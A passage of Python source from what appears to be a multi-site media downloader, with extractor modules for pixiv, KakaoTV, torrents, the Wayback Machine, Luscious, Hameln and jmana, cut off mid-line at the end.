qs.get('bgt', [None])[0] ratio = qs.get('ratio', [None])[0] tool = qs.get('tool', [None])[0] logs = [ f'order: {order}', f'mode: {mode}', f's_mode: {s_mode}', f'scd / ecd: {scd} / {ecd}', f'type: {type_}', f'wlt / wgt: {wlt} / {wgt}', f'hlt / hgt: {hlt} / {hgt}', f'blt / bgt: {blt} / {bgt}', f'ratio: {ratio}', f'tool: {tool}', ] print_('\n'.join(logs)) ids = [] ids_set = set() p = 1 while len(ids) < max_pid: data = api.search(q, order, mode, p=p, s_mode=s_mode, scd=scd, ecd=ecd, type_=type_, wlt=wlt, wgt=wgt, hlt=hlt, hgt=hgt, blt=blt, bgt=bgt, ratio=ratio, tool=tool) c = 0 for id in [illust['id'] for illust in data['illustManga']['data'] if 'id' in illust]: if id in ids_set: continue ids_set.add(id) ids.append(id) c += 1 if not c: break p += 1 process_ids(ids, info, imgs, session, cw, depth) elif 'bookmark_new_illust.php' in url or 'bookmark_new_illust_r18.php' in url or re.search(r'/users/[0-9]+/following', url): # Newest works: Following r18 = 'bookmark_new_illust_r18.php' in url id_ = my_id(session, cw) process_user(id_, info, api) info['title'] = f'{info["artist"]} (pixiv_following_{"r18_" if r18 else ""}{info["artist_id"]})' ids = [] ids_set = set() p = 1 while len(ids) < max_pid: data = api.following(p, r18=r18) c = 0 for id in data['page']['ids']: if id in ids_set: continue ids_set.add(id) ids.append(id) c += 1 if not c: break p += 1 process_ids(ids, info, imgs, session, cw, depth) elif api.user_id(url): # User illusts m = re.search(r'/users/[0-9]+/([\w]+)/?([^\?#/]*)', url) type_ = {'illustrations': 'illusts', 'manga': 'manga'}.get(m and m.groups()[0]) if type_: types = [type_] else: types = ['illusts', 'manga'] if m: tag = unquote(m.groups()[1]) or None else: tag = None print_(f'types: {types}, tag: {tag}') id_ = api.user_id(url) process_user(id_, info, api) data = api.profile(id_) info['title'] = f'{info["artist"]} (pixiv_{info["artist_id"]})' ids = [] for type_ in types: illusts = data[type_] if not illusts: continue ids += list(illusts.keys()) ids = sorted(ids, key=int, reverse=True) print_(f'ids: {len(ids)}') if not ids: raise Exception('no imgs') process_ids(ids, info, imgs, session, cw, depth, tags_add=[tag] if tag else None) else: raise NotImplementedError() info['imgs'] = imgs[:max_pid] return info def parse_time(ds): ds, z = ds[:-6], ds[-6:] dt = int(z[:3]) * 3600 + int(z[4:]) * 60 time = datetime.strptime(ds.replace(' ', ' '), '%Y-%m-%dT%H:%M:%S') time = (time-datetime(1970,1,1)).total_seconds() return time - dt @try_n(4, sleep=.5) #5469 def my_id(session, cw): print_ = get_print(cw) sid = session.cookies.get('PHPSESSID', domain='.pixiv.net', path='/') if not sid: raise LoginRequired() if cw is not None: _ = getattr(cw, 'sid?', None) if _ is None: setattr(cw, 'sid?', sid) print_(f'sid: {sid}') userid = re.find(r'^([0-9]+)', sid) if userid is None: raise LoginRequired() return userid def process_user(id_, info, api): info['artist_id'] = id_ data_user = api.top(id_) info['artist'] = data_user['extraData']['meta']['ogp']['title'] def process_ids(ids, info, imgs, session, cw, depth=0, tags_add=None): print_ = get_print(cw) max_pid = get_max_range(cw) names = cw.names_old table = {} for name in names: id = re.find(r'([0-9]+)_p[0-9]+.*\.(jpg|jpeg|png|apng|bmp|webp|gif)$', os.path.basename(name)) #5541 if id is None: continue ext = os.path.splitext(name)[1] if ext.lower() in ['.gif', '.webp']: #5541 try: img = Image_.open(name) n_frames = getattr(img, 'n_frames', 1) except Exception as e: print_(print_error(e)) n_frames = 1 if n_frames > 1: print_(f'ugoira: {name}') continue id = id[0] if id in table: table[id].append(name) else: table[id] = [name] c_old = 0 class Thread(threading.Thread): alive = True rem = 0 def __init__(self, queue): super().__init__(daemon=True) self.queue = queue @classmethod @lock def add_rem(cls, x): cls.rem += x def run(self): nonlocal c_old while self.alive: try: id_, res, i = self.queue.popleft() except: sleep(.1) continue try: names = table.get(str(id_)) if names is not None: res[i] = utils.natural_sort(names) c_old += 1 else: info_illust = get_info(f'https://www.pixiv.net/en/artworks/{id_}', session, cw, depth=depth+1, tags_add=tags_add) res[i] = info_illust['imgs'] except Exception as e: if depth == 0 and (e.args and e.args[0] == '不明なエラーが発生しました' or isinstance(e, errors.LoginRequired)): # logout during extraction res[i] = e print_(f'process_ids error (id: {id_}, d:{depth}):\n{print_error(e)}') finally: Thread.add_rem(-1) queue = deque() n, step = Downloader_pixiv.STEP print_(f'{n} / {step}') ts = [] for i in range(n): t = Thread(queue) t.start() ts.append(t) for i in range(0, len(ids), step): res = [[]]*step for j, id_illust in enumerate(ids[i:i+step]): queue.append((id_illust, res, j)) Thread.add_rem(1) while Thread.rem: sleep(.01, cw) for imgs_ in res: if isinstance(imgs_, Exception): raise imgs_ imgs += imgs_ s = f'{tr_("읽는 중...")} {info["title"]} - {len(imgs)}' if cw: cw.setTitle(s) else: print(s) if len(imgs) >= max_pid: break if depth == 0: check_alive(cw) for t in ts: t.alive = False print_(f'c_old: {c_old}') File: src/extractor/kakaotv_downloader.py import downloader import ytdl from utils import Downloader, try_n, LazyUrl, get_ext, format_filename from io import BytesIO as IO class Downloader_kakaotv(Downloader): type = 'kakaotv' URLS = ['tv.kakao'] single = True display_name = 'KakaoTV' ACCEPT_COOKIES = [r'(.*\.)?kakao\.com'] @classmethod def fix_url(cls, url): url = url.replace('.kakao.com/m/', '.kakao.com/') return url.split('?')[0].strip('/') def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw @try_n(2) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['ext'] == 'mp4'] f = sorted(fs, key=lambda f: f['height'])[-1] self._url = f['url'] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] ext = get_ext(self._url) self.filename = format_filename(self.title, info['id'], ext) return self._url File: src/extractor/torrent_downloader.py from utils import Downloader, clean_title, lock, json import constants, os, downloader from size import Size from timee import sleep from translator import tr_ import utils import filesize as fs from datetime import datetime import errors import ips import order from cacher import Cache torrent = None TIMEOUT = 1800 CACHE_INFO = True def isInfoHash(s): if len(s) != 40: return False try: bytes.fromhex(s) return True except: return False class Downloader_torrent(Downloader): type = 'torrent' URLS = [r'regex:^magnet:', r'regex:\.torrent$', isInfoHash] single = True update_filesize = False _info = None _name = None _filesize_prev = 0 _upload_prev = 0 _state = None _h = None _dn = None MAX_PARALLEL = 16 MAX_CORE = 0 skip_convert_imgs = True _filesize_init = False _max_speed = None _anon = False _proxy = '', '', 0, '', '' _seeding = False _virgin = True STOP_READING = False PRIORITY = -1 @classmethod def fix_url(cls, url): if isInfoHash(url): url = f'magnet:?xt=urn:btih:{url}' return url @classmethod def set_max_speed(cls, speed): cls._max_speed = speed cls.updateSettings() @classmethod def set_anon(cls, flag): cls._anon = flag cls.updateSettings() @classmethod def set_proxy(cls, protocol, host, port, username, password): cls._proxy = protocol, host, port, username, password cls.updateSettings() @classmethod @lock def updateSettings(cls): if torrent is None: print('torrent is None') return torrent.set_max_speed(cls._max_speed) torrent.set_anon(cls._anon) torrent.set_proxy(*cls._proxy) @classmethod def _import_torrent(cls): global torrent if torrent is None: import torrent @lock def __init(self): self._import_torrent() Downloader_torrent.updateSettings() @classmethod def key_id(cls, url): if torrent is None: #print('torrent is None') return url id_, e = torrent.key_id(url) if e: print(e) return id_ @property def name(self): if self._name is None: self._name = clean_title(self._info.name()) return self._name @classmethod def get_dn(cls, url): if not url: return if url.startswith('magnet:'): qs = utils.query_url(url) if 'dn' in qs: return utils.html_unescape(qs['dn'][0]) def read(self): cw = self.cw self.cw.pbar.hide() self.__init() if cw: cw._torrent_s = None self._dn = self.get_dn(cw.gal_num) info = getattr(cw, 'info?', None) if info is not None: self.print_('cached info') self._info = info if self._info is None: if not (self.url.startswith('http') or self.url.startswith('magnet:')) and not os.path.exists(self.url): sr = cw.serial_retry if sr is not None: self.url = json.loads(sr)['url'] or self.url try: self._info = torrent.get_info(self.url, cw, timeout=TIMEOUT, callback=self.callback) if CACHE_INFO: setattr(cw, 'info?', self._info) except: self.update_pause() if not cw.paused: raise errors.Invalid(f'Faild to read metadata: {self.url}', fail=True) if self._info is None: cw.paused = True if cw.paused: return hash_ = self._info.hash.hex() self.print_(f'v2: {self._info.v2}') self.print_(f'Hash: {hash_}') if not self._info.v2: self.url = f'magnet:?xt=urn:btih:{hash_}'# date = datetime.fromtimestamp(self._info.creation_date()) date = date.strftime('%y-%m-%d %H:%M:%S') self.print_(f'Created on: {date}') self.print_(f'Total size: {fs.size(self._info.total_size())}') self.print_(f'Pieces: {self._info.num_pieces()} x {fs.size(self._info.piece_length())}') self.print_(f'Creator: {self._info.creator()}') self.print_(f'Comment: {self._info.comment()}') cw.setTotalFileSize(self._info.total_size()) cw.imgs.clear() cw.dones.clear() self.urls = [self.url] self.title = self.name self.update_files() if not self.single and not os.path.isdir(self.dir): #4698 downloader.makedir_event(self.dir, cw) cw.pbar.show() def update_files(self): cw = self.cw files = torrent.get_files(self._info, cw=cw) if not files: raise Exception('No files') cw.single = self.single = len(files) <= 1 index = [0]*len(files) filesize = [] for i, file in enumerate(files): filename = os.path.join(self.dir, file.path) cw.imgs.append(filename) index[file.index] = i filesize.append(file.size) self._torrent_index = index self._torrent_filesize = filesize def update_pause(self): cw = self.cw if cw.pause_lock: if self._seeding: cw.pause_lock = False return cw.pause_data = { 'type': self.type, 'url': self.url, } cw.paused = True cw.pause_lock = False self.update_tools_buttons() def start_(self): cw = self.cw cw.pbar.setFormat('%p%') cw.setColor('reading') cw.downloader_pausable = True self._seeding = False pr = cw.get_extra('pr') if cw.paused: #data = cw.pause_data cw.paused = False cw.pause_lock = False self.update_tools_buttons() try: self.read() if self.status == 'stop': self.stop() return True if cw.paused: pass else: cw.dir = self.dir cw.urls[:] = self.urls cw.clearPieces() self.size = Size() self.size_upload = Size() cw.pbar.setMaximum(self._info.total_size()) cw.setColor('reading') if pr is None and utils.ui_setting.torrentSelectFiles.isChecked(): from utils import QApplication, QStyle, QIcon cache_icon = Cache(1024) files = torrent.get_files(self._info) icon_size = QApplication.style().pixelMetric(QStyle.PM_ListViewIconSize) def _getIcon(name): ext = os.path.splitext(name)[1] key_icon = icon_size, ext.lower() icon = cache_icon.get(key_icon) if icon is None: pixmap = utils.image_reader.getFilePixmap(name, size=icon_size, pad=0) icon = QIcon() icon.addPixmap(pixmap) cache_icon.set(key_icon, icon) return icon done = False res = None def f(): nonlocal done, res try: while True: res = order.getOrder([[True, file.path] for file in files], utils.ui.listWidget, self.title, tr_('파일을 고르세요:'), True, size=(600, 600), icon=_getIcon, move=False) if res is None or any(item[0] for item in res): break utils.messageBox('No files selected', self.title, icon=utils.QMessageBox.Warning, parent=utils.ui.listWidget) finally: done = True utils.exec_queue.run(f) while True: sleep(1, cw) if done: break if res: pr = [None] * len(files) for file, item in zip(files, res): pr[file.index] = int(item[0]) cw.set_extra('pr', pr) else: raise errors.Invalid(f'Canceled: {self.url}') torrent.download(self._info, save_path=self.dir, callback=self.callback, cw=cw, pr=pr) self.update_progress(self._h) cw.setSpeed(0.0) cw.setUploadSpeed(0.0) if not cw.alive: return self.update_pause() if cw.paused: return True self.title = self.name if not self.single: cw.pbar.setMaximum(len(cw.imgs)) finally: cw.clearPieces() try: # for Item.showFiles cw.set_extra('torrent_progress', torrent.get_file_progress(self._h, self._info, False)) except Exception as e: cw.remove_extra('torrent_progress') self.print_error(e) self._h = None def _updateIcon(self): cw = self.cw n = 4 for try_ in range(n): if cw.setIcon(cw.imgs[0], icon=try_==n-1): break sleep(.5) def update_progress(self, h): if self._info is None: return cw = self.cw if not cw.imgs: #??? self.print_('???') self.update_files() cw.setPieces(torrent.pieces(h, self._info)) def callback(self, h, s, alerts): try: return self._callback(h, s, alerts) except Exception as e: self.print_error(e) return 'abort' def _callback(self, h, s, alerts): self._h = h cw = self.cw if self._virgin: self._virgin = False try: ips.get('0.0.0.0') except Exception as e: self.print_error(e) if self._state != s.state_str: self._state = s.state_str self.print_(f'state: {s.state_str}') title = (self._dn or self.url) if self._info is None else self.name try: if cw.alive and cw.valid and not cw.pause_lock: seeding = False cw._torrent_s = s self.update_progress(h) filesize = s.total_done upload = s.total_upload color = 'downloading' if s.state_str in ('downloading', 'seeding'): # init filesize if not self._filesize_init: self._filesize_prev = filesize self._filesize_init = True self.print_(f'init filesize: {fs.size(filesize)}') # download d_size = filesize - self._filesize_prev self._filesize_prev = filesize self.size += d_size downloader.total_download_size_torrent += d_size # upload d_size = upload - self._upload_prev self._upload_prev = upload self.size_upload += d_size downloader.total_upload_size_torrent += d_size if self._info is not None: cw.pbar.setValue(s.progress * self._info.total_size()) if s.state_str == 'queued': color = 'reading' title_ = f'{tr_("대기 중...")} {title}' elif s.state_str == 'checking files': color = 'reading' title_ = f'{tr_("파일 체크 중...")} {title}' self._filesize_prev = filesize elif s.state_str == 'downloading': title_ = f'{title}' cw.setFileSize(filesize) cw.setSpeed(self.size.speed) cw.setUploadSpeed(self.size_upload.speed) elif s.state_str == 'seeding': cw.setFileSize(filesize) if not cw.seeding: return 'abort' seeding = True title_ = f'{tr_("시딩...")} {title}' cw.setSpeed(self.size_upload.speed) elif s.state_str == 'reading': color = 'reading' title_ = f'{tr_("읽는 중...")} {title}' elif s.state_str == 'finished': return 'abort' else: title_ = f'{s.state_str.capitalize()}... {title}' cw.setTitle(title_, update_filter=False) cw.setColor(color) self._seeding = seeding else: self.print_('abort') if cw: cw._torrent_s = None return 'abort' finally: if alerts: if not cw.imgs: #??? self.print_('??? 2') self.update_files() names = cw.names for alert in alerts: what = alert['what'] if what == 'file_completed': index = alert['index'] index = self._torrent_index[index] try: file = os.path.abspath(names[index]) except IndexError: continue #??? cw.dones.add(file) file = constants.compact(file).replace('\\', '/') files = file.split('/') file = ' / '.join(files[1:]) filesize = self._torrent_filesize[index] msg = f'Completed: {file} | {fs.size(filesize)}' self.print_(msg) if index == 0: self._updateIcon() else: raise NotImplementedError(what) @utils.actions('torrent') def actions(cw): if cw.type != 'torrent': return items = [item for item in cw.listWidget().selectedItems() if item.type == 'torrent'] seeding = int(all(item._seeding for item in items)) * 2 if not seeding: seeding = int(all(item._seeding is False for item in items)) if not seeding: seeding = 0 if all(item._seeding is None for item in items) else None if seeding is None: mix_seeding = any(item._seeding for item in items) mix_no_seeding = any(item._seeding is False for item in items) mix_pref = any(item._seeding is None for item in items) else: mix_seeding = mix_no_seeding = mix_pref = False return [ {'icon': 'list', 'text': '파일 목록', 'clicked': cw.showFiles}, {'icon': 'peer', 'text': 'Peers', 'clicked': cw.showPeers}, {'icon': 'tracker', 'text': '트래커 수정', 'clicked': cw.editTrackers}, {'text':'-'}, {'text': '시딩', 'clicked': lambda:cw.setSeedings(True), 'checkable': True, 'checked': seeding==2, 'group': 'seeding', 'mixed': mix_seeding}, {'text': '시딩 하지 않음', 'clicked': lambda:cw.setSeedings(False), 'checkable': True, 'checked': seeding==1, 'group': 'seeding', 'mixed': mix_no_seeding}, {'text': '설정을 따름', 'clicked': lambda:cw.setSeedings(None), 'checkable': True, 'checked': seeding==0, 'group': 'seeding', 'mixed': mix_pref}, ] File: src/extractor/wayback_machine_downloader.py # coding: utf8 # title: Wayback Machine Downloader # author: bog_4t import downloader import concurrent.futures import os import ree as re from hashlib import md5 from ratelimit import limits, sleep_and_retry from utils import Downloader, Session, clean_title, get_print, print_error class Downloader_wayback_machine(Downloader): type = 'waybackmachine' URLS = ['archive.org', 'web.archive.org'] display_name = 'Wayback Machine' MAX_CORE = 1 def read(self): filter_ = Filter(self.url, self.cw) self.url = f'https://web.archive.org/cdx/search/cdx?url={filter_.url}' self.title = filter_.title self.urls.extend(get_imgs(self.url, filter_, self.dir, self.session, self.cw)) self.title = filter_.title class WaybackMachineAPI: def __init__(self, session, cw=None): self.session = session self.cw = cw self.params = { 'output': 'json', 'fl': 'timestamp,original', 'filter': 'mimetype:text/html&filter=statuscode:200', 'collapse': 'urlkey' } @sleep_and_retry @limits(1, 5) def call(self, url): for (key, value) in self.params.items(): url += f'&{key}={value}' return downloader.read_json(url, session=self.session) def snapshots(self, url): data = self.call(url) return data[1:] class Filter: domains = [ 'twitter.com' ] def __init__(self, url, cw=None): self.cw = cw self.url = re.findall(r'archive.[^/]+/(?:cdx/search/cdx\?url=|(?:web/)?(?:[^/]+/))(.+)', url.lower())[0].strip('/') self.base_url = self.url.split('&')[0].strip('/') self.md5 = md5(self.url.encode('utf8')).hexdigest()[:8] self.mode = self.__get_mode() self.title = self.__get_title() def __get_mode(self): for mode in (mode for mode, domain in enumerate(self.domains, start=1) if domain in self.url): return mode return 0 def __get_title(self): def default(): tail = f" ({md5(self.base_url.encode('utf8')).hexdigest()[:8]})" return clean_title(os.path.basename(self.base_url), n=-len(tail)) + tail def twitter(): return '@' + re.findall('twitter.[^/]+/([^/*?]+)', self.url)[0] return [ default, twitter ][self.mode]() class Bitmap: bitmask = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80] def __init__(self, size=0, cw=None): self.cw = cw self.bitmap = bytearray([False] * ((size + 7) // 8)) def set(self, index): self.bitmap[index // 8] |= self.bitmask[index % 8] def unset(self, index): self.bitmap[index // 8] &= ~self.bitmask[index % 8] def get(self, index): return (self.bitmap[index // 8] & (self.bitmask[index % 8])) != 0 def save(self, path): with open(path, 'wb') as file: file.seek(0) file.write(self.bitmap) def load(self, size, path): with open(path, 'rb') as file: self.bitmap = bytearray(file.read((size + 7) // 8)) return self def update(self, id_, path): self.set(id_) self.save(path) def get_imgs(url, filter_, directory, session=Session(), cw=None): print_ = get_print(cw) if not os.path.exists(directory): os.makedirs(directory) urls_path = os.path.join(directory, '{}.urls'.format(filter_.md5)) bitmap_path = os.path.join(directory, '{}.bitmap'.format(filter_.md5)) count_path = os.path.join(directory, '{}.count'.format(filter_.md5)) for path in [urls_path, bitmap_path, count_path]: if not os.path.exists(path): open(path, 'x').close() with open(count_path) as file: num_complete = (lambda x: int(x) if x else 0)(file.read()) snapshots = WaybackMachineAPI(session, cw).snapshots(url) bitmap = Bitmap(cw=cw).load(len(snapshots), bitmap_path) if num_complete else Bitmap(len(snapshots), cw=cw) base_url = 'https://web.archive.org/web/{}im_/{}' def get_imgs_snapshot(id_, snapshot): @sleep_and_retry @limits(1, 5) def get_soup(): try: return downloader.read_soup(f'https://web.archive.org/web/{snapshot[0]}id_/{snapshot[1]}') except Exception as exception: print_(print_error(exception)[0]) return None def get_imgs_soup(soup): if not soup: return [] def default(): return [base_url.format(snapshot[0], img['src']) for img in soup.find_all('img', src=True)] def twitter(): return [base_url.format(snapshot[0], img['src']) for img in soup.find_all('img', src=True) if 'twimg.com/media/' in img['src']] return [ default, twitter ][filter_.mode]() return id_, get_imgs_soup(get_soup()) with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: futures = [executor.submit(get_imgs_snapshot, id_, snapshot) for id_, snapshot in enumerate(snapshots) if not bitmap.get(id_)] with open(urls_path, 'a') as urls_file: for future in concurrent.futures.as_completed(futures): id_, urls = future.result() urls_file.writelines([f'{url}\n' for url in urls]) bitmap.update(id_, bitmap_path) num_complete += 1 with open(count_path, 'w') as count_file: count_file.write(str(num_complete)) msg = f'{filter_.title} - {num_complete}' cw.setTitle(msg) if cw else print_(msg) with open(urls_path) as file: urls = set() for url in file.readlines(): urls.update(re.findall(r'^\S+$', url)) os.remove(urls_path) os.remove(bitmap_path) os.remove(count_path) return urls File: src/extractor/luscious_downloader.py #coding:utf8 import downloader import utils from utils import Soup, Downloader, LazyUrl, urljoin, try_n, clean_title, get_max_range, json import ree as re import os from translator import tr_ from io import BytesIO import clf2 import errors downloader.REPLACE_UA[r'\.luscious\.net'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://members.luscious.net/login/') class Image: def __init__(self, item, referer): self.item = item self.id = str(item['id']) self.referer = referer self.url = LazyUrl(referer, self.get, self) def get(self, url): img = urljoin(url, self.item['url_to_original']) ext = os.path.splitext(img.split('?')[0])[1] self.filename = '{}{}'.format(self.id, ext) return img class Video: id = None def __init__(self, url, title, url_thumb): self.url = url self.title = title ext = os.path.splitext(url.split('?')[0])[1] self.filename = '{}{}'.format(clean_title(title), ext) self.url_thumb = url_thumb self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) class Downloader_luscious(Downloader): type = 'luscious' URLS = ['luscious.net'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?luscious\.net'] @classmethod def fix_url(cls, url): url = url.replace('members.luscious.', 'www.luscious.') return url @classmethod def key_id(cls, url): return '/'.join(url.split('/')[3:]) def read(self): def f(html, browser=None): soup = Soup(html) if soup.find('input', type='password'): browser.show() return False browser.hide() try: get_title(soup) except: return False return True res = clf2.solve(self.url, f=f, cw=self.cw, show=True) self.url = res['url'] soup = Soup(res['html']) if soup.find(class_='http-error-404-page-container'): raise LoginRequired(get_title(soup)) #6912 title = clean_title(get_title(soup)) self.title = tr_('읽는 중... {}').format(title) if '/videos/' in self.url: video = get_video(self.url, soup) imgs = [video] self.setIcon(video.thumb) else: imgs = get_imgs(self.url, soup, self.cw) dir = utils.dir(self.type, title, self.cw) names = {} try: for name in os.listdir(dir): id = os.path.splitext(name)[0] names[id] = name except: pass for img in imgs: if img.id in names: url = os.path.join(dir, names[img.id]) else: url = img.url self.urls.append(url) self.title = title# def update(cw, title, imgs): s = '{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs)) if cw is not None: cw.setTitle(s) else: print(s) def get_imgs(url, soup=None, cw=None): if soup is None: html = downloader.read_html(url) soup = Soup(html) title = get_title(soup) n = get_max_range(cw) imgs = [] p = 1 while True: imgs_new, has_next_page = get_imgs_p(url, p) if not imgs_new: break imgs += imgs_new update(cw, title, imgs) p += 1 if len(imgs) >= n or not has_next_page: break return imgs[:n] @try_n(4, sleep=30) def get_imgs_p(url, p=1): id = re.find('/albums/[^/]+?([0-9]+)/', url+'/') print(url, id) #5699 #url_api = 'https://api.luscious.net/graphql/nobatch/?operationName=AlbumListOwnPictures&query=+query+AlbumListOwnPictures%28%24input%3A+PictureListInput%21%29+%7B+picture+%7B+list%28input%3A+%24input%29+%7B+info+%7B+...FacetCollectionInfo+%7D+items+%7B+...PictureStandardWithoutAlbum+%7D+%7D+%7D+%7D+fragment+FacetCollectionInfo+on+FacetCollectionInfo+%7B+page+has_next_page+has_previous_page+total_items+total_pages+items_per_page+url_complete+%7D+fragment+PictureStandardWithoutAlbum+on+Picture+%7B+__typename+id+title+created+like_status+number_of_comments+number_of_favorites+status+width+height+resolution+aspect_ratio+url_to_original+url_to_video+is_animated+position+tags+%7B+category+text+url+%7D+permissions+url+thumbnails+%7B+width+height+size+url+%7D+%7D+&variables=%7B%22input%22%3A%7B%22filters%22%3A%5B%7B%22name%22%3A%22album_id%22%2C%22value%22%3A%22{}%22%7D%5D%2C%22display%22%3A%22position%22%2C%22page%22%3A{}%7D%7D'.format(id, p) url_api = f'https://apicdn.luscious.net/graphql/nobatch/?operationName=AlbumListOwnPictures&query=%2520query%2520AlbumListOwnPictures%28%2524input%253A%2520PictureListInput%21%29%2520%257B%2520picture%2520%257B%2520list%28input%253A%2520%2524input%29%2520%257B%2520info%2520%257B%2520...FacetCollectionInfo%2520%257D%2520items%2520%257B%2520__typename%2520id%2520title%2520description%2520created%2520like_status%2520number_of_comments%2520number_of_favorites%2520moderation_status%2520width%2520height%2520resolution%2520aspect_ratio%2520url_to_original%2520url_to_video%2520is_animated%2520position%2520tags%2520%257B%2520category%2520text%2520url%2520%257D%2520permissions%2520url%2520thumbnails%2520%257B%2520width%2520height%2520size%2520url%2520%257D%2520%257D%2520%257D%2520%257D%2520%257D%2520fragment%2520FacetCollectionInfo%2520on%2520FacetCollectionInfo%2520%257B%2520page%2520has_next_page%2520has_previous_page%2520total_items%2520total_pages%2520items_per_page%2520url_complete%2520%257D%2520&variables=%7B%22input%22%3A%7B%22filters%22%3A%5B%7B%22name%22%3A%22album_id%22%2C%22value%22%3A%22{id}%22%7D%5D%2C%22display%22%3A%22rating_all_time%22%2C%22items_per_page%22%3A50%2C%22page%22%3A{p}%7D%7D' data_raw = downloader.read_html(url_api, referer=url) data = json.loads(data_raw) imgs = [] for item in data['data']['picture']['list']['items']: img = Image(item, url) imgs.append(img) return imgs, data['data']['picture']['list']['info']['has_next_page'] def get_video(url, soup): title = re.find('videos/([^/]+)', url) video = soup.find('video') url = urljoin(url, video.source.attrs['src']) url_thumb = urljoin(url, video['poster']) video = Video(url, title, url_thumb) return video def get_title(soup): return soup.find('h1').text.strip() File: src/extractor/hameln_downloader.py #coding: utf8 import downloader import os import utils from utils import Soup, urljoin, get_text, LazyUrl, try_n, Downloader, lazy, clean_title import ree as re from io import BytesIO from translator import tr_ class Downloader_hameln(Downloader): type = 'hameln' URLS = ['syosetu.org'] MAX_CORE = 2 detect_removed = False ACCEPT_COOKIES = [r'(.*\.)?syosetu\.org'] def init(self): id_ = re.find('/novel/([^/]+)', self.url) if id_ is not None: self.url = 'https://syosetu.org/novel/{}/'.format(id_) @lazy def soup(self): html = read_html(self.url) soup = Soup(html) return soup @lazy def info(self): return get_info(self.url, self.soup) def read(self): for page in get_pages(self.url, self.soup): text = Text(page, len(self.urls)+1) self.urls.append(text.url) self.artist = self.info['artist'] self.title = clean_title('[{}] {}'.format(self.artist, self.info['title']), n=-len('[merged] .txt')) def post_processing(self): names = self.cw.names filename = os.path.join(self.dir, '[merged] {}.txt'.format(self.title)) try: with utils.open(filename, 'wb') as f: f.write(' {}\n\n 作者:{}\n\n\n'.format(self.info['title'], self.artist).encode('utf8')) if self.info['novel_ex']: f.write(self.info['novel_ex'].encode('utf8')) for i, file in enumerate(names): self.cw.pbar.setFormat('[%v/%m] {} [{}/{}]'.format(tr_('병합...'), i, len(names))) with open(file, 'rb') as f_: text = f_.read() f.write(b'\n\n\n\n') f.write(text) finally: self.cw.pbar.setFormat('[%v/%m]') class Text: def __init__(self, page, p): self.page = page self.url = LazyUrl(page.url, self.get, self) self.filename = clean_title('[{:04}] {}'.format(p, page.title), n=-4) + '.txt' def get(self, url): text = read_page(self.page) f = BytesIO() f.write(text.encode('utf8')) f.seek(0) return f class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url def read_html(url): return downloader.read_html(url, cookies={'over18': 'off'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36'}) def get_sss(soup): sss = [ss for ss in soup.findAll('div', class_='ss') if ss.attrs.get('id')!='fmenu'] return sss def get_pages(url, soup=None): if soup is None: html = read_html(url) soup = Soup(html) sss = get_sss(soup) list = sss[-1] pages = [] for tr in list.findAll('tr'): a = tr.find('a') if a is None: continue text =a.text.strip() href = urljoin(url, a.attrs['href']) page = Page(text, href) pages.append(page) return pages @try_n(22, sleep=30) def read_page(page): html = read_html(page.url) soup = Soup(html) text_top = get_text(soup.find('div', id='maegaki')) print(text_top.count('\n')) text_mid = get_text(soup.find('div', id='honbun')) text_bot = get_text(soup.find('div', id='atogaki')) texts = [text for text in (text_top, text_mid, text_bot) if text] story = ''' ──────────────────────────────── '''.join(texts) text = '''──────────────────────────────── ◆ {} ──────────────────────────────── {}'''.format(page.title, story) return text def get_info(url, soup=None): if soup is None: html = read_html(url) soup = Soup(html) info = {} info['artist'] = soup.find('span', {'itemprop':'author'}).text.strip() info['title'] = soup.find('span', {'itemprop':'name'}).text.strip() sss = get_sss(soup) info['novel_ex'] = get_text(sss[-2]) return info File: src/extractor/jmana_downloader.py import downloader from utils import Soup, urljoin, Downloader, fix_title, Session, get_print, LazyUrl, clean_title, get_imgs_already, check_alive, try_n, clean_url import ree as re from timee import sleep from translator import tr_ import page_selector import bs4 import clf2 PATTERN = r'jmana[0-9]*.*/(comic_list_title|book)\?book' PATTERN_ALL = r'jmana[0-9]*.*/((comic_list_title|book|bookdetail)\?book|book_by_title\?title)' #6157 PATTERN_ID = '[?&]bookdetailid=([0-9]+)' class Image: def __init__(self, url, page, p): self.url = LazyUrl(page.url, lambda _: url, self) ext = '.jpg' name = '{:04}{}'.format(p, ext) self.filename = '{}/{}'.format(page.title, name) class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url self.id = int(re.find(PATTERN_ID, url)) class Downloader_jmana(Downloader): type = 'jmana' URLS = ['regex:'+PATTERN_ALL] MAX_CORE = 8 _soup = None def init(self): self.url = clean_url(self.url) self.session = Session() if re.search(PATTERN_ID, self.url): #1799 select = self.soup.find('select', class_='bookselect') for i, op in enumerate(select.findAll('option')[::-1]): if 'selected' in op.attrs: break else: raise Exception('no selected option') for a in self.soup.findAll('a'): url = urljoin(self.url, a.get('href') or '') if re.search(PATTERN, url): break else: raise Exception('list not found') self.url = self.fix_url(url) self._soup = None for i, page in enumerate(get_pages(self.url, self.soup, self.session)): if page.id == int(op['value']): break else: raise Exception('can not find page') self.cw.range_p = [i] @classmethod def fix_url(cls, url): return url @property def soup(self): if self._soup is None: res = clf2.solve(self.url, session=self.session) #4070 html = res['html'] soup = Soup(html) self._soup = soup return self._soup @property def name(self): title = get_title(self.soup) artist = get_artist(self.soup) title = fix_title(self, title, artist) return title def read(self): title = self.name artist = get_artist(self.soup) self.artist = artist for img in get_imgs(self.url, title, self.session, soup=self.soup, 